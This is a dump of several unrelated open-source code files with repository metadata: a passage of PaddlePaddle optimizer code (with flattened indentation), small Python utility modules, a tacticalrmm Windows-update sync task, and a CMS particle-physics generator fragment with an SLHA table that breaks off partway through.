new_grad = self._create_regularization_of_grad(
param, grad, regularization
)
params_and_grads.append((param, new_grad))
else:
repeate_regularizer = False
with framework.name_scope('regularization'):
for param, grad in parameters_and_grads:
if (
not repeate_regularizer
and param.regularizer is not None
and regularization is not None
):
repeate_regularizer = True
                        logging.info(
                            "If the regularizer of a Parameter has already been set by 'fluid.ParamAttr' or 'fluid.WeightNormParamAttr', "
                            "the Regularization[%s] in the Optimizer will not take effect for it and will only be applied to other Parameters!"
% regularization.__str__()
)
with param.block.program._optimized_guard([param, grad]):
new_grad = self._create_regularization_of_grad(
param, grad, regularization
)
params_and_grads.append((param, new_grad))
return params_and_grads
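    # Hedged sketch of the regularization precedence implemented above (the
    # ParamAttr / regularizer calls are standard Paddle APIs; the variable
    # names are illustrative only):
    #
    #   import paddle
    #   w_attr = paddle.ParamAttr(regularizer=paddle.regularizer.L1Decay(1e-4))
    #   linear = paddle.nn.Linear(10, 10, weight_attr=w_attr)
    #   # The global L2Decay applies to every parameter except those that already
    #   # carry their own regularizer (the weight above keeps its L1Decay).
    #   opt = paddle.optimizer.Momentum(learning_rate=0.1,
    #                                   parameters=linear.parameters(),
    #                                   weight_decay=paddle.regularizer.L2Decay(1e-4))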
def _get_no_grad_set(self, loss, no_grad_set=None):
no_grad_set = _get_no_grad_set_name(no_grad_set)
parameters = loss.block.program.global_block().all_parameters()
param_no_trainable = {
param.name for param in parameters if param.stop_gradient is True
}
        # If the parameter is not trainable, it should not have a gradient.
no_grad_set.update(param_no_trainable)
return no_grad_set
@framework.non_static_only
def clear_grad(self, set_to_zero=True):
"""
        Clear the gradients of all optimized parameters for the model.
        Otherwise, new gradients will accumulate on top of the previous gradients.
There are two method to clear grad: set_to_zero or delete grad.
Args:
set_to_zero (bool, optional): If set grads to zero or not, default is True.
Returns:
None
Examples:
.. code-block:: python
import paddle
a = paddle.arange(26, dtype="float32").reshape([2, 13])
linear = paddle.nn.Linear(13, 5)
# This can be any optimizer supported by dygraph.
adam = paddle.optimizer.Adam(learning_rate = 0.01,
parameters = linear.parameters())
out = linear(a)
out.backward()
adam.step()
adam.clear_grad()
"""
param_list = []
if self._parameter_list is None or not isinstance(
self._parameter_list[0], dict
):
for p in self._parameter_list:
if not p.stop_gradient:
param_list.append(p)
else:
for param_group in self._param_groups:
for p in param_group['params']:
if not p.stop_gradient:
param_list.append(p)
for p in param_list:
p.clear_gradient(set_to_zero)
@imperative_base.no_grad()
def minimize(
self, loss, startup_program=None, parameters=None, no_grad_set=None
):
"""
Add operations to minimize ``loss`` by updating ``parameters``.
Args:
loss (Tensor): A ``Tensor`` containing the value to minimize.
startup_program (Program, optional): :ref:`api_fluid_Program` for
initializing parameters in ``parameters``. The default value
is None, at this time :ref:`api_fluid_default_startup_program` will be used.
parameters (list, optional): List of ``Tensor`` or ``Tensor.name`` to update
to minimize ``loss``. The default value is None, at this time all parameters
will be updated.
no_grad_set (set, optional): Set of ``Tensor`` or ``Tensor.name`` that don't need
to be updated. The default value is None.
Returns:
tuple: tuple (optimize_ops, params_grads), A list of operators appended
by minimize and a list of (param, grad) tensor pairs, param is
``Parameter``, grad is the gradient value corresponding to the parameter.
In static graph mode, the returned tuple can be passed to ``fetch_list`` in ``Executor.run()`` to
indicate program pruning. If so, the program will be pruned by ``feed`` and
``fetch_list`` before run, see details in ``Executor``.
Examples:
.. code-block:: python
import paddle
linear = paddle.nn.Linear(10, 10)
input = paddle.uniform(shape=[10, 10], min=-0.1, max=0.1)
out = linear(input)
loss = paddle.mean(out)
beta1 = paddle.to_tensor([0.9], dtype="float32")
beta2 = paddle.to_tensor([0.99], dtype="float32")
adam = paddle.optimizer.Adam(learning_rate=0.1,
parameters=linear.parameters(),
weight_decay=0.01)
loss.backward()
adam.minimize(loss)
adam.clear_grad()
"""
        assert isinstance(loss, Variable), "The loss should be a Tensor."
parameter_list = parameters if parameters else self._parameter_list
params_grads = self.backward(
loss,
startup_program=startup_program,
parameters=parameter_list,
no_grad_set=no_grad_set,
)
optimize_ops = self._apply_optimize(
loss, startup_program=startup_program, params_grads=params_grads
)
return optimize_ops, params_grads
def _declarative_step(self):
"""
        In declarative mode, we forward the `step` call to `apply_gradients`.
"""
params = (
paddle.static.default_main_program().global_block().all_parameters()
)
assert not isinstance(
self._parameter_list[0], dict
), "Only list of parameters is supported while using optimizer in @paddle.jit.static."
selected_params = {param.name for param in self._parameter_list}
parameters = [param for param in params if param.trainable]
parameters = list(
filter(
lambda x: x.name in selected_params and hasattr(x, "grad"),
parameters,
)
)
params_grads = [(param, param.grad) for param in parameters]
optimize_ops = self.apply_gradients(params_grads)
return
@imperative_base.no_grad()
@framework.non_static_only
def step(self):
"""
Execute the optimizer and update parameters once.
Returns:
None
Examples:
.. code-block:: python
import paddle
a = paddle.arange(26, dtype="float32").reshape([2, 13])
linear = paddle.nn.Linear(13, 5)
# This can be any optimizer supported by dygraph.
adam = paddle.optimizer.Adam(learning_rate = 0.01,
parameters = linear.parameters())
out = linear(a)
out.backward()
adam.step()
adam.clear_grad()
"""
if paddle.fluid.dygraph.base.in_declarative_mode():
self._declarative_step()
return
if not isinstance(self._param_groups[0], dict):
params_grads = []
for param in self._param_groups:
if param.stop_gradient:
continue
if param._grad_ivar() is not None:
grad_var = param._grad_ivar()
params_grads.append((param, grad_var))
self._apply_optimize(
loss=None,
startup_program=None,
params_grads=params_grads,
param_group_idx=0,
)
else:
# optimize parameters in groups
for idx, param_group in enumerate(self._param_groups):
params_grads = defaultdict(lambda: [])
for param in param_group['params']:
if param.stop_gradient:
continue
if param._grad_ivar() is not None:
grad_var = param._grad_ivar()
params_grads['params'].append((param, grad_var))
params_grads.update(
{k: v for k, v in param_group.items() if k != 'params'}
)
self._apply_optimize(
loss=None,
startup_program=None,
params_grads=params_grads,
param_group_idx=idx,
)
def _add_param_group(self, param_group):
"""
Add a param group to parameter_list.
Args:
            param_group (dict): The group of Tensors to be optimized with
                different optimization options.
"""
params = param_group['params']
if isinstance(params, Parameter):
param_group['params'] = [params]
elif isinstance(params, set):
raise TypeError(
"optimizer parameters should be in ordered collections,"
"but received set, please use list instead."
)
else:
param_group['params'] = list(params)
# Update optimization options for each groups
for k, v in self._default_dict.items():
param_group.setdefault(k, v)
param_set = set()
for group in self._param_groups:
param_set.update(set(group['params']))
if not param_set.isdisjoint(set(param_group['params'])):
raise ValueError(
"some parameters appear in more than one parameter group"
)
for param in param_group['params']:
weight_decay = param_group['weight_decay']
if isinstance(weight_decay, float):
regularization = L2Decay(weight_decay)
else:
regularization = weight_decay
param.regularizer = regularization
param.optimize_attr['learning_rate'] = param_group.get(
'learning_rate', 1.0
)
self._param_groups.append(param_group)
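    # Hedged sketch of the parameter-group format consumed by _add_param_group
    # (the layers and option values are illustrative only):
    #
    #   import paddle
    #   linear1 = paddle.nn.Linear(10, 10)
    #   linear2 = paddle.nn.Linear(10, 1)
    #   opt = paddle.optimizer.Adam(
    #       learning_rate=0.01,
    #       parameters=[
    #           {'params': linear1.parameters()},   # uses the optimizer defaults
    #           {'params': linear2.parameters(),
    #            'learning_rate': 0.1,              # per-group scale on the global LR
    #            'weight_decay': 0.001},            # float -> wrapped in L2Decay
    #       ],
    #   )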
def _update_param_group(self, parameters):
"""
Update the param group with new entry
Args:
            parameters (dict): The extra group of Tensors to be optimized with
                different optimization options. Only used in child classes.
"""
pass
@framework.dygraph_only
def _multi_tensor_init(self, target_block, parameters, param_group_idx):
"""
All parameters used for optimizer (such as: parameters, master_weight, velocity_acc for momentum) calculations are grouped into a python list by data type (float16, float32).
This function will be overridden in the corresponding optimizer file.
Args:
target_block: the block in which the loss tensor is present
parameters: list of parameter tensors for the optimizer
"""
pass
@framework.dygraph_only
def _append_optimize_multi_tensor_op(
self, target_block, parameters_and_grads, param_group_idx
):
"""
For Multi Tensor, append optimize merged_operator to block.
"""
pass
def _is_dtype_fp16_or_bf16(self, dtype):
"""
check the dtype is fp16 or the dtype is bf16
:param dtype: instance of core.VarDesc.VarType
:return: True if dtype is one of fp16 or bf16, False otherwise
"""
assert isinstance(
dtype, core.VarDesc.VarType
), "The dtype should be an instance of core.VarDesc.VarType."
return (
dtype == core.VarDesc.VarType.FP16
or dtype == core.VarDesc.VarType.BF16
)
| [
"[email protected]"
] | |
5590c83b21209475b9f2d74cbf0f4aa8bc06fdf7 | 88023c9a62994e91291c67088156a2894cc26e9e | /corral/exceptions.py | 6b957a785fc63342e2236f36930ddf95e737b7a0 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | toros-astro/corral | 41e9d0224d734c4268bf5161d472b3c0375842f0 | 75474b38ff366330d33644461a902d07374a5bbc | refs/heads/master | 2023-06-10T15:56:12.264725 | 2018-09-03T17:59:41 | 2018-09-03T17:59:41 | 44,282,921 | 6 | 5 | BSD-3-Clause | 2023-03-24T12:03:17 | 2015-10-14T23:56:40 | Python | UTF-8 | Python | false | false | 1,745 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2016-2017, Cabral, Juan; Sanchez, Bruno & Berois, Martín
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
class ValidationError(Exception):
pass
class ImproperlyConfigured(ValueError):
pass
class DBError(Exception):
pass
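# Hedged usage sketch (illustrative; the calling code is not part of this module):
#
#   from corral import exceptions
#   if connection_string is None:  # `connection_string` is a made-up example value
#       raise exceptions.ImproperlyConfigured("CONNECTION setting is missing")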
| [
"[email protected]"
] | |
3314310b124324421bdc948e97abc2584f9cc2e0 | 30268e3918f8dc079a757e985fee374605c931b2 | /api/tacticalrmm/winupdate/tasks.py | 487b171e5b0bfbde2f2bdf9fc3fb94be0d93781c | [
"MIT"
] | permissive | doytsujin/tacticalrmm | e1be7ad7950bb95c4b37dd63ac03eb323115d866 | 7fb79e0bcce62dbb892fb36665ff6d7135d7bebf | refs/heads/master | 2021-03-21T14:02:24.858487 | 2020-02-24T07:11:15 | 2020-02-24T07:11:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,999 | py | from time import sleep
from agents.models import Agent
from .models import WinUpdate
from tacticalrmm.celery import app
@app.task
def check_for_updates_task(pk, wait=False):
if wait:
sleep(60)
agent = Agent.objects.get(pk=pk)
resp = agent.salt_api_cmd(
hostname=agent.salt_id,
timeout=310,
salt_timeout=300,
func="win_wua.list",
arg="skip_installed=False",
)
data = resp.json()
ret = data["return"][0][agent.salt_id]
# if managed by wsus, nothing we can do until salt supports it
if type(ret) is str:
err = ["unknown failure", "2147352567", "2145107934"]
if any(x in ret.lower() for x in err):
agent.managed_by_wsus = True
agent.save(update_fields=["managed_by_wsus"])
return f"{agent.hostname} managed by wsus"
else:
        # if previously managed by wsus but no longer (i.e. moved into a different OU in AD)
# then we can use salt to manage updates
if agent.managed_by_wsus and type(ret) is dict:
agent.managed_by_wsus = False
agent.save(update_fields=["managed_by_wsus"])
guids = []
for k in ret.keys():
guids.append(k)
if not WinUpdate.objects.filter(agent=agent).exists():
for i in guids:
WinUpdate(
agent=agent,
guid=i,
kb=ret[i]["KBs"][0],
mandatory=ret[i]["Mandatory"],
title=ret[i]["Title"],
needs_reboot=ret[i]["NeedsReboot"],
installed=ret[i]["Installed"],
downloaded=ret[i]["Downloaded"],
description=ret[i]["Description"],
severity=ret[i]["Severity"],
).save()
else:
for i in guids:
# check if existing update install / download status has changed
if WinUpdate.objects.filter(agent=agent).filter(guid=i).exists():
update = WinUpdate.objects.filter(agent=agent).get(guid=i)
if ret[i]["Installed"] != update.installed:
update.installed = not update.installed
update.save(update_fields=["installed"])
if ret[i]["Downloaded"] != update.downloaded:
update.downloaded = not update.downloaded
update.save(update_fields=["downloaded"])
# otherwise it's a new update
else:
WinUpdate(
agent=agent,
guid=i,
kb=ret[i]["KBs"][0],
mandatory=ret[i]["Mandatory"],
title=ret[i]["Title"],
needs_reboot=ret[i]["NeedsReboot"],
installed=ret[i]["Installed"],
downloaded=ret[i]["Downloaded"],
description=ret[i]["Description"],
severity=ret[i]["Severity"],
).save()
return "ok"
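# Hedged usage sketch (illustrative only): the task is normally queued through
# Celery rather than called directly, e.g. from a view or another task:
#
#   check_for_updates_task.delay(agent.pk, wait=True)  # async via the broker
#   check_for_updates_task(agent.pk)                   # synchronous call, e.g. in tests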
| [
"[email protected]"
] | |
494aff1c24d6117476f11ab965437fac14f43806 | 20c80f722c451b64d05cc027b66a81e1976c3253 | /commons/libs/pyblish/version.py | c978ffa548ff2ad57bbaba63dc1da19b5ff66f43 | [] | no_license | flypotatojun/Barbarian | 2d3fcb6fcb1b4495b6d62fc5e32634abf4638312 | efe14dd24c65b4852997dad1290e503211bcc419 | refs/heads/master | 2021-07-18T01:43:14.443911 | 2017-10-24T03:37:43 | 2017-10-24T03:37:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 229 | py |
VERSION_MAJOR = 1
VERSION_MINOR = 4
VERSION_PATCH = 3
version_info = (VERSION_MAJOR, VERSION_MINOR, VERSION_PATCH)
version = '%i.%i.%i' % version_info
__version__ = version
__all__ = ['version', 'version_info', '__version__']
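# Hedged usage sketch (illustrative):
#
#   import pyblish.version
#   print(pyblish.version.version)        # "1.4.3"
#   print(pyblish.version.version_info)   # (1, 4, 3)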
| [
"[email protected]"
] | |
7003acb4f3816d60e19ac4b06f49d305dda66cfb | 2cb120360192dfdf9afa233c8585232cb3df6e8c | /samples/tf_study/prettytensor/funcs/register.py | 4d06d359b79901fe2eaade7d27002d9a528b7ee5 | [] | no_license | CosmosShadow/MLPythonLib | 6323583bca8c6ff5757465fb1a0d5c4f23deb56c | 3a2da2601330a032b737ff0addf71f679eeee94b | refs/heads/master | 2020-05-21T15:08:58.082575 | 2017-04-30T17:03:15 | 2017-04-30T17:03:15 | 44,087,820 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 431 | py | # coding: utf-8
import tensorflow as tf
import prettytensor as pt
import numpy as np
import cmtf.data.data_mnist as data_mnist
@pt.Register
def leaky_relu(input_pt):
return tf.select(tf.greater(input_pt, 0.0), input_pt, 0.01*input_pt)
x = tf.Variable([1, 2, 3, -3, -2, -1], dtype=tf.float32)
x_pretty = pt.wrap(x)
y = x_pretty.leaky_relu()
with tf.Session() as sess:
sess.run(tf.initialize_all_variables())
print(sess.run(y)) | [
"[email protected]"
] | |
9a9896bbf00e4f6f26308c7699d8939dd2d12b92 | 0fccee4c738449f5e0a8f52ea5acabf51db0e910 | /genfragments/ThirteenTeV/LongLivedChi0/LongLivedChi0ToNuLL_MSquark_1000_MChi_700_CTau1mm_to_1000mm_TuneCUETP8M1_13TeV_pythia8_cff.py | 989f40b6f2ad7b491251cf3a1f09bb503852f142 | [] | no_license | cms-sw/genproductions | f308ffaf3586c19b29853db40e6d662e937940ff | dd3d3a3826343d4f75ec36b4662b6e9ff1f270f4 | refs/heads/master | 2023-08-30T17:26:02.581596 | 2023-08-29T14:53:43 | 2023-08-29T14:53:43 | 11,424,867 | 69 | 987 | null | 2023-09-14T12:41:28 | 2013-07-15T14:18:33 | Python | UTF-8 | Python | false | false | 41,743 | py | COM_ENERGY = 13000 # GeV
SQUARK_MASS = 1000 # GeV
CHIZERO_MASS = 700 # GeV
GLUINO_MASS = 5000 # GeV
CROSS_SECTION = 0.02296 # pb
CHIZERO1_CTAU = 1 # mm
CHIZERO2_CTAU = 10 # mm
CHIZERO3_CTAU = 100 # mm
CHIZERO4_CTAU = 100 # mm
SLHA_TABLE = """
#
# ======================
# | THE SUSYHIT OUTPUT |
# ======================
#
#
# ------------------------------------------------------
# | This is the output of the SUSY-HIT package |
# | created by A.Djouadi, M.Muehlleitner and M.Spira. |
# | In case of problems with SUSY-HIT email to |
# | [email protected] |
# | [email protected] |
# | [email protected] |
# ------------------------------------------------------
#
# ------------------------------------------------------
# | SUSY Les Houches Accord - MSSM Spectrum + Decays |
# | based on the decay programs |
# | |
# | SDECAY 1.5 |
# | |
# | Authors: M.Muhlleitner, A.Djouadi and Y.Mambrini |
# | Ref.: Comput.Phys.Commun.168(2005)46 |
# | [hep-ph/0311167] |
# | |
# | HDECAY 3.4 |
# | |
# | By: A.Djouadi,J.Kalinowski,M.Muhlleitner,M.Spira |
# | Ref.: Comput.Phys.Commun.108(1998)56 |
# | [hep-ph/9704448] |
# | |
# | |
# | If not stated otherwise all DRbar couplings and |
# | soft SUSY breaking masses are given at the scale |
# | Q= 0.46577748E+03
# | |
# ------------------------------------------------------
#
# This file contains spectra and decay modes calculated by SUSYHIT in ~tomalin/susy_susyhit/
# with all SUSY masses set high, except for the u,d,s,c squark and all four neutralino masses,
# and the gluino mass, which are set low by hand. Furthermore, the decay modes and width of the "neutralino1",
# "neutralino2", "neutralino3" and "neutralino4" are set by hand to allow R-parity violating
# decays to the chosen final states with the chosen lifetimes. The u,d,s,c squarks given by hand a 100% BR
# to quark + neutralino.
#
BLOCK DCINFO # Decay Program information
1 SDECAY/HDECAY # decay calculator
2 1.5 /3.4 # version number
#
BLOCK SPINFO # Spectrum calculator information
1 SuSpect # RGE +Spectrum calculator
2 2.41 # version number
#
BLOCK MODSEL # Model selection
1 1 # #SUGRA
#
BLOCK SMINPUTS # Standard Model inputs
1 1.27934000E+02 # alpha_em^-1(M_Z)^MSbar
2 1.16639000E-05 # G_F [GeV^-2]
3 1.17200000E-01 # alpha_S(M_Z)^MSbar
4 9.11870000E+01 # M_Z pole mass
5 4.25000000E+00 # mb(mb)^MSbar
6 1.72500000E+02 # mt pole mass
7 1.77710000E+00 # mtau pole mass
#
BLOCK MINPAR # Input parameters - minimal models
1 1.00000000E+02 # m0
2 2.50000000E+02 # m_1
3 1.00000000E+01 # tanbeta(mZ)
4 1.00000000E+00 # sign(mu)
5 -1.00000000E+02 # A0
#
BLOCK EXTPAR # Input parameters - non-minimal models
0 4.65777483E+02 # EWSB
#
BLOCK MASS # Mass Spectrum
# PDG code mass particle
24 8.04847331E+01 # W+
25 1.09932416E+02 # h
35 3.94935594E+02 # H
36 3.94525488E+02 # A
37 4.02953218E+02 # H+
5 4.87877839E+00 # b-quark pole mass calculated from mb(mb)_Msbar
1000001 1.00000000e+03 # ~d_L
2000001 1.00000000e+03 # ~d_R
1000002 1.00000000e+03 # ~u_L
2000002 1.00000000e+03 # ~u_R
1000003 1.00000000e+03 # ~s_L
2000003 1.00000000e+03 # ~s_R
1000004 1.00000000e+03 # ~c_L
2000004 1.00000000e+03 # ~c_R
1000005 1.16777573E+05 # ~b_1
2000005 1.46086561E+05 # ~b_2
1000006 1.99615017E+05 # ~t_1
2000006 1.86391641E+05 # ~t_2
1000011 2.00774228E+05 # ~e_L
2000011 1.42820157E+05 # ~e_R
1000012 1.84853985E+05 # ~nu_eL
1000013 2.00774228E+05 # ~mu_L
2000013 1.42820157E+05 # ~mu_R
1000014 1.84853985E+05 # ~nu_muL
1000015 1.33342244E+05 # ~tau_1
2000015 2.04795115E+05 # ~tau_2
1000016 1.83966053E+05 # ~nu_tauL
1000021 5.00000000e+03 # ~g
1000022 7.00000000e+02 # ~chi_10
1000023 7.00000000e+02 # ~chi_20
1000025 7.00000000e+02 # ~chi_30
1000035 7.00000000e+02 # ~chi_40
1000024 1.79671182E+05 # ~chi_1+
1000037 3.77983105E+05 # ~chi_2+
#
BLOCK NMIX # Neutralino Mixing Matrix
1 1 9.85345167E-01 # N_11
1 2 -5.64225409E-02 # N_12
1 3 1.51059160E-01 # N_13
1 4 -5.56105151E-02 # N_14
2 1 1.06123308E-01 # N_21
2 2 9.39651214E-01 # N_22
2 3 -2.80885422E-01 # N_23
2 4 1.64002501E-01 # N_24
3 1 6.12835220E-02 # N_31
3 2 -9.07288796E-02 # N_32
3 3 -6.95178480E-01 # N_33
3 4 -7.10450196E-01 # N_34
4 1 1.18646854E-01 # N_41
4 2 -3.25023636E-01 # N_42
4 3 -6.44213777E-01 # N_43
4 4 6.82107887E-01 # N_44
#
BLOCK UMIX # Chargino Mixing Matrix U
1 1 -9.11420712E-01 # U_11
1 2 4.11475741E-01 # U_12
2 1 4.11475741E-01 # U_21
2 2 9.11420712E-01 # U_22
#
BLOCK VMIX # Chargino Mixing Matrix V
1 1 -9.70421546E-01 # V_11
1 2 2.41416701E-01 # V_12
2 1 2.41416701E-01 # V_21
2 2 9.70421546E-01 # V_22
#
BLOCK STOPMIX # Stop Mixing Matrix
1 1 5.52988023E-01 # cos(theta_t)
1 2 8.33189202E-01 # sin(theta_t)
2 1 -8.33189202E-01 # -sin(theta_t)
2 2 5.52988023E-01 # cos(theta_t)
#
BLOCK SBOTMIX # Sbottom Mixing Matrix
1 1 9.30091013E-01 # cos(theta_b)
1 2 3.67329154E-01 # sin(theta_b)
2 1 -3.67329154E-01 # -sin(theta_b)
2 2 9.30091013E-01 # cos(theta_b)
#
BLOCK STAUMIX # Stau Mixing Matrix
1 1 2.84460080E-01 # cos(theta_tau)
1 2 9.58687886E-01 # sin(theta_tau)
2 1 -9.58687886E-01 # -sin(theta_tau)
2 2 2.84460080E-01 # cos(theta_tau)
#
BLOCK ALPHA # Higgs mixing
-1.14188002E-01 # Mixing angle in the neutral Higgs boson sector
#
BLOCK HMIX Q= 4.65777483E+02 # DRbar Higgs Parameters
1 3.52164861E+02 # mu(Q)
2 9.75041102E+00 # tanbeta(Q)
3 2.45014641E+02 # vev(Q)
4 1.62371513E+05 # MA^2(Q)
#
BLOCK GAUGE Q= 4.65777483E+02 # The gauge couplings
1 3.60982135E-01 # gprime(Q) DRbar
2 6.46351672E-01 # g(Q) DRbar
3 1.09632112E+00 # g3(Q) DRbar
#
BLOCK AU Q= 4.65777483E+02 # The trilinear couplings
1 1 -6.83184382E+02 # A_u(Q) DRbar
2 2 -6.83184382E+02 # A_c(Q) DRbar
3 3 -5.06144038E+02 # A_t(Q) DRbar
#
BLOCK AD Q= 4.65777483E+02 # The trilinear couplings
1 1 -8.58985213E+02 # A_d(Q) DRbar
2 2 -8.58985213E+02 # A_s(Q) DRbar
3 3 -7.96595983E+02 # A_b(Q) DRbar
#
BLOCK AE Q= 4.65777483E+02 # The trilinear couplings
1 1 -2.53298464E+02 # A_e(Q) DRbar
2 2 -2.53298464E+02 # A_mu(Q) DRbar
3 3 -2.51542764E+02 # A_tau(Q) DRbar
#
BLOCK Yu Q= 4.65777483E+02 # The Yukawa couplings
1 1 0.00000000E+00 # y_u(Q) DRbar
2 2 0.00000000E+00 # y_c(Q) DRbar
3 3 8.78978125E-01 # y_t(Q) DRbar
#
BLOCK Yd Q= 4.65777483E+02 # The Yukawa couplings
1 1 0.00000000E+00 # y_d(Q) DRbar
2 2 0.00000000E+00 # y_s(Q) DRbar
3 3 1.39517330E-01 # y_b(Q) DRbar
#
BLOCK Ye Q= 4.65777483E+02 # The Yukawa couplings
1 1 0.00000000E+00 # y_e(Q) DRbar
2 2 0.00000000E+00 # y_mu(Q) DRbar
3 3 1.01147257E-01 # y_tau(Q) DRbar
#
BLOCK MSOFT Q= 4.65777483E+02 # The soft SUSY breaking masses at the scale Q
1 1.01486794E+02 # M_1
2 1.91565439E+02 # M_2
3 5.86284400E+02 # M_3
21 3.23226904E+04 # M^2_Hd
22 -1.24993993E+05 # M^2_Hu
31 1.95443359E+02 # M_eL
32 1.95443359E+02 # M_muL
33 1.94603750E+02 # M_tauL
34 1.35950985E+02 # M_eR
35 1.35950985E+02 # M_muR
36 1.33480599E+02 # M_tauR
41 5.45553618E+02 # M_q1L
42 5.45553618E+02 # M_q2L
43 4.97578078E+02 # M_q3L
44 5.27538927E+02 # M_uR
45 5.27538927E+02 # M_cR
46 4.23429537E+02 # M_tR
47 5.25444117E+02 # M_dR
48 5.25444117E+02 # M_sR
49 5.22139557E+02 # M_bR
#
#
#
# =================
# |The decay table|
# =================
#
# - The QCD corrections to the decays gluino -> squark + quark
# squark -> gaugino + quark_prime
# squark -> squark_prime + Higgs
# squark -> gluino + quark
# are included.
#
# - The multi-body decays for the inos, stops and sbottoms are included.
#
# - The loop induced decays for the gluino, neutralinos and stops
# are included.
#
# - The SUSY decays of the top quark are included.
#
#
# PDG Width
DECAY 6 1.44633943E+00 # top decays
# BR NDA ID1 ID2
1.00000000E+00 2 5 24 # BR(t -> b W+)
#
# PDG Width
DECAY 1000021 7.60054186E+02 # gluino decays
# BR NDA ID1 ID2
6.25000000E-02 2 1000001 -1 # BR(~g -> ~d_L db)
6.25000000E-02 2 -1000001 1 # BR(~g -> ~d_L* d )
6.25000000E-02 2 2000001 -1 # BR(~g -> ~d_R db)
6.25000000E-02 2 -2000001 1 # BR(~g -> ~d_R* d )
6.25000000E-02 2 1000002 -2 # BR(~g -> ~u_L ub)
6.25000000E-02 2 -1000002 2 # BR(~g -> ~u_L* u )
6.25000000E-02 2 2000002 -2 # BR(~g -> ~u_R ub)
6.25000000E-02 2 -2000002 2 # BR(~g -> ~u_R* u )
6.25000000E-02 2 1000003 -3 # BR(~g -> ~s_L sb)
6.25000000E-02 2 -1000003 3 # BR(~g -> ~s_L* s )
6.25000000E-02 2 2000003 -3 # BR(~g -> ~s_R sb)
6.25000000E-02 2 -2000003 3 # BR(~g -> ~s_R* s )
6.25000000E-02 2 1000004 -4 # BR(~g -> ~c_L cb)
6.25000000E-02 2 -1000004 4 # BR(~g -> ~c_L* c )
6.25000000E-02 2 2000004 -4 # BR(~g -> ~c_R cb)
6.25000000E-02 2 -2000004 4 # BR(~g -> ~c_R* c )
#
# PDG Width
DECAY 1000006 5.20726800E+08 # stop1 decays
# BR NDA ID1 ID2
6.94407916E-07 2 1000022 6 # BR(~t_1 -> ~chi_10 t )
7.54006758E-07 2 1000023 6 # BR(~t_1 -> ~chi_20 t )
1.74512689E-06 2 1000025 6 # BR(~t_1 -> ~chi_30 t )
9.52699953E-07 2 1000035 6 # BR(~t_1 -> ~chi_40 t )
1.56675416E-07 2 1000024 5 # BR(~t_1 -> ~chi_1+ b )
1.30596297E-05 2 1000021 6 # BR(~t_1 -> ~g t )
1.23218005E-11 2 1000005 37 # BR(~t_1 -> ~b_1 H+)
-1.39984102E-12 2 2000005 37 # BR(~t_1 -> ~b_2 H+)
9.48532652E-01 2 1000005 24 # BR(~t_1 -> ~b_1 W+)
5.14499859E-02 2 2000005 24 # BR(~t_1 -> ~b_2 W+)
#
# PDG Width
DECAY 2000006 7.43034077E+08 # stop2 decays
# BR NDA ID1 ID2
1.17380400E-07 2 1000022 6 # BR(~t_2 -> ~chi_10 t )
5.49682993E-07 2 1000023 6 # BR(~t_2 -> ~chi_20 t )
9.14655161E-07 2 1000025 6 # BR(~t_2 -> ~chi_30 t )
1.36777476E-06 2 1000035 6 # BR(~t_2 -> ~chi_40 t )
1.06348847E-08 2 1000024 5 # BR(~t_2 -> ~chi_1+ b )
8.72407685E-06 2 1000021 6 # BR(~t_2 -> ~g t )
1.27939288E-12 2 1000005 37 # BR(~t_2 -> ~b_1 H+)
-1.03472409E-12 2 2000005 37 # BR(~t_2 -> ~b_2 H+)
9.62083919E-01 2 1000005 24 # BR(~t_2 -> ~b_1 W+)
3.79043964E-02 2 2000005 24 # BR(~t_2 -> ~b_2 W+)
#
# PDG Width
DECAY 1000005 1.45287195E+04 # sbottom1 decays
# BR NDA ID1 ID2
5.66130593E-03 2 1000022 5 # BR(~b_1 -> ~chi_10 b )
6.03025772E-02 2 1000023 5 # BR(~b_1 -> ~chi_20 b )
1.44120022E-03 2 1000025 5 # BR(~b_1 -> ~chi_30 b )
6.36747404E-03 2 1000035 5 # BR(~b_1 -> ~chi_40 b )
9.26227443E-01 2 1000021 5 # BR(~b_1 -> ~g b )
#
# PDG Width
DECAY 2000005 7.36323181E+06 # sbottom2 decays
# BR NDA ID1 ID2
1.43513479E-05 2 1000022 5 # BR(~b_2 -> ~chi_10 b )
1.14591077E-05 2 1000023 5 # BR(~b_2 -> ~chi_20 b )
9.50353235E-06 2 1000025 5 # BR(~b_2 -> ~chi_30 b )
1.65018741E-05 2 1000035 5 # BR(~b_2 -> ~chi_40 b )
1.56864744E-03 2 1000021 5 # BR(~b_2 -> ~g b )
-2.65633090E-12 2 1000005 25 # BR(~b_2 -> ~b_1 h )
-8.87029310E-11 2 1000005 35 # BR(~b_2 -> ~b_1 H )
-1.62921553E-10 2 1000005 36 # BR(~b_2 -> ~b_1 A )
9.98379537E-01 2 1000005 23 # BR(~b_2 -> ~b_1 Z )
#
# PDG Width
